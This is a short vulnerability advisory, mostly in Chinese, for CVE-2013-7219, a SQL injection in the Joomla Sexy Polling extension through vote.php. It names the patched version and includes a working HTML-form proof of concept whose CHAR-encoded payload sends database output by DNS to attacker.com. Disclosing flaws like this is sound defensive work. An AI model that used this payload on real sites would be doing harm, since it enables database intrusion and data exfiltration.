CVE ID:CVE-2013-7219
Joomla是一款内容管理系统。
该漏洞由于传递到"/components/com_sexypolling/vote.php"脚本的"answer_id[]" HTTP POST参数未能充分验证,远程攻击者可以在应用数据库中执行任意SQL操作。
0
Sexy Polling Joomla Extension <=1.0.8
Sexy Polling 1.0.9版本以修复此漏洞,建议用户下载使用:
http://2glux.com/forum/sexypolling/sexy-polling-security-vulnerability-notification-t2026.html
The following exploitation example is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP address for `version()` (or any other sensitive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):
<form action="http://[host]/components/com_sexypolling/vote.php"
method="post" name="main">
<input type="hidden" name="answer_id[]" value="',(select load_file(CONCAT(CHAR(92),CHAR(92),(select
version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97 ),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CH AR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))),'','','','','')
-- ">
<input type="submit" id="btn">
</form>